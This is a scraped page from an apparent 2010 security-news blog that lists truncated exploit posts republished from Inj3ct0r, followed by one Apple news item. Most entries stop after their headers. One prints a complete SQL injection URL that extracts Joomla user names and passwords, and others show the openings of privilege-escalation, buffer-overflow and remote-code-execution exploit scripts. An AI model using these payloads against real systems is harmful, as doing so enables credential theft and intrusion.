grab our rss feed

Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

Home

Entries for July 8th, 2010

GCards <= 1.46 SQL Injection Vulnerability

Jul.08, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>GCards <= 1.46 SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==========================================
GCards <= 1.46 SQL Injection Vulnerability
==========================================
=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-==-
NAME SCRIPT :GCARDS
Version: 1.46
=============================
Author: 70P-H4CK3R [...]

Leave a Comment

Joomla Component com_mtree <= 1.0 Remote File Include Vulnerability

Jul.08, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_mtree <= 1.0 Remote File Include Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===================================================================
Joomla Component com_mtree <= 1.0 Remote File Include Vulnerability
===================================================================
[~]######################################### InformatioN #############################################[~]
[~] Title : Joomla Mosets Tree <= 1.0 Remote File Include Vulnerability
[~] Author [...]

Leave a Comment

Dynamic photo gallery V1.02 SQL Injection Vulnerability

Jul.08, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Dynamic photo gallery V1.02 SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================================
Dynamic photo gallery V1.02 SQL Injection Vulnerability
=======================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Zylone IT Multiple Blind SQL Injection Vulnerability

Jul.08, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Zylone IT Multiple Blind SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================
Zylone IT Multiple Blind SQL Injection Vulnerability
====================================================
10101010101010101010101010101010101010101010101010101010101010101010101010101010
0 [...]

Leave a Comment

Shopping Cart Script SQL Injection Vulnerability

Jul.08, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Shopping Cart Script SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================
Shopping Cart Script SQL Injection Vulnerability
================================================
####################################
[+] Title: Shopping Cart Script SQL Injection Vulnerability
[+] Date: 8.6.2010
[+] Author: ThEtA.Nu
[+] Software Link: http://www.softbizscripts.com / payoptions.php?pid=23&pamount=115&pname=Softbiz%20Shopping%20Cart%20Script
[+] Tested Windows 7 , Windows Xp
[+] Where [...]

Leave a Comment

Zundi CMS Multiple Vulnerability

Jul.08, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Zundi CMS Multiple Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================
Zundi CMS Multiple Vulnerability
================================
#######################################
I’m SixP4ck3r member from Inj3ct0r Team
#######################################
Author : SixP4ck3r
Group : BOLIVIAN SYSTEM TEAM
Email & msn : SixP4ck3r@Bolivia.com
Date : 08 July 2010
Critical Lvl : High
Impact : Exposure of sensitive information
Where : From Remote
web [...]

Leave a Comment

Websmart XSS/SQL Injection Vulnerability

Jul.08, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Websmart XSS/SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>========================================
Websmart XSS/SQL Injection Vulnerability
========================================
__ __
.—-..–.–.| |–..—–..—-.| |.—–..—–.
| __|| | || _ [...]

Leave a Comment

Joomla Component com_rentalot SQL Injection Vulnerability

Jul.08, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_rentalot SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=========================================================
Joomla Component com_rentalot SQL Injection Vulnerability
=========================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Joomla Component com_inter SQL Injection Vulnerability

Jul.08, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_inter SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>======================================================
Joomla Component com_inter SQL Injection Vulnerability
======================================================
Aria-Security Team (Persian Security Network)
http://Aria-Security.Net
——————————-
Shoutz : AurA, Sc0rp!on, mormoroth, Kinglet, iM4N,
Joomla com_inter "id" Remote SQL Injection
index.php?option=com_inter&op=The-0utl4wz&id=-11111111111111/**/union/**/select/**/username,1,2,3,password,5,6,7,8,9/**/from/**/jos_user
(Original Advisory@ http://forum.aria-security.net/showthread.php?p=1464)
The-0utl4w
Aria-Security Team
(Credits to Aria-Security Team)
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-08]</pre><script type=’text/javascript’>var gaJsHost [...]

Leave a Comment

IrcDelphi Daemon Server Denial of Service

Jul.08, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>IrcDelphi Daemon Server Denial of Service</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=========================================
IrcDelphi Daemon Server Denial of Service
=========================================
[Software]
- IrcDelphi Daemon Server
[Vendor Product Description]
- IRC Daemon (IRCd, IRC Server) coded in Delphi/Kylix using Indy
components. Easy to use and light irc daemon.
[Bug Description]
- The IRC Daemon [...]

Leave a Comment

Ubuntu PAM MOTD File Tampering (Privilege Escalation)

Jul.08, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Ubuntu PAM MOTD File Tampering (Privilege Escalation)</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=====================================================
Ubuntu PAM MOTD File Tampering (Privilege Escalation)
=====================================================
#!/bin/sh
#
# Exploit Title: Ubuntu PAM MOTD file tampering (privilege escalation)
# Date: July 7, 2010
# Author: Kristian Erik Hermansen <kristian.hermansen@gmail.com>
# Software Link: http://packages.ubuntu.com/
# Version: pam-1.1.0
# Tested [...]

Leave a Comment

EA Battlefield 2 and Battlefield 2142 Multiple Arbitrary File Upload

Jul.08, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>EA Battlefield 2 and Battlefield 2142 Multiple Arbitrary File Upload </title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================================
EA Battlefield 2 and Battlefield 2142 Multiple Arbitrary File Upload
====================================================================
#######################################################################
Luigi Auriemma
Application: Refractor 2 engine
Games: Battlefield 2 <= 1.50 (aka 1.5.3153-802.0)
http://www.battlefield.ea.com/battlefield/bf2/
Battlefield 2142 <= 1.50 (aka 1.10.48.0)
http://battlefield.ea.com/battlefield/bf2142/
…
other games developed [...]

Leave a Comment

FathFTP 1.7 ActiveX Buffer Overflow

Jul.08, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>FathFTP 1.7 ActiveX Buffer Overflow</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===================================
FathFTP 1.7 ActiveX Buffer Overflow
===================================
<html>
<object classid=’clsid:62A989CE-D39A-11D5-86F0-B9C370762176′
id=’target’></object>
<script language=’vbscript’>
‘ Exploit Title: FathFTP 1.7 ActiveX Buffer Overflow
‘ Date: July 7, 2010
‘ Author: Blake
‘ Software Link: http://www.softpedia.com/get/Programming/Components-Libraries/FathFTP.shtml
‘ Version: 1.7
‘ Tested on: Windows XP SP3 / IE6
‘ Note: [...]

Leave a Comment

UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution Snow Leopard

Jul.08, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution Snow Leopard</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==============================================================================
UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution Snow Leopard (ROP)
==============================================================================
#!/usr/bin/python
# UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution – MacOSX
# OS X Snow Leopard: [...]

Leave a Comment

Saeculum 2009 Multiple SQL Injection Vulnerability

Jul.08, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Saeculum 2009 Multiple SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==================================================
Saeculum 2009 Multiple SQL Injection Vulnerability
==================================================
[+] Author: TeaM MosTa
[+] Software Link:http://www.saeculum.tv/
[+] Tested on Win Xp Sp2/Sp3 linux & seven 7
[+] Category: [webapps/0day]
####################################
[~] ExPLoiTed by TeaM MosTa
[~] Team: TeaM MosTa
[~] Contact: booba27izi@starkods.com
[~] Home: [...]

Leave a Comment

Joomla Component Music Manager LFI Vulnerability

Jul.08, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component Music Manager LFI Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================
Joomla Component Music Manager LFI Vulnerability
================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

linux/x86 find all writeable folder in filesystem 91 bytes

Jul.08, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>linux/x86 find all writeable folder in filesystem 91 bytes</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==========================================================
linux/x86 find all writeable folder in filesystem 91 bytes
==========================================================
/*
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ [...]

Leave a Comment

Apple Claims Steve Jobsâ?? iPhone 4 Mails Are Fake

Jul.08, 2010 in News

Apple claims that an email exchange between CEO Steve Jobs and a customer over the iPhone 4â??s reception issues is a fake, according to the company.
The conversation had originally been printed on 1 July on the blog Boy Genius Report, and features Jobs trying to placate an irate, self-described â??Mac fanâ?.
An Apple spokesperson â??emphaticallyâ? denied [...]

Leave a Comment

Quote

We use Linux for all our mission-critical applications. Having the source code means that we are not held hostage by anyone's support department.

Categories
- Exploits
- News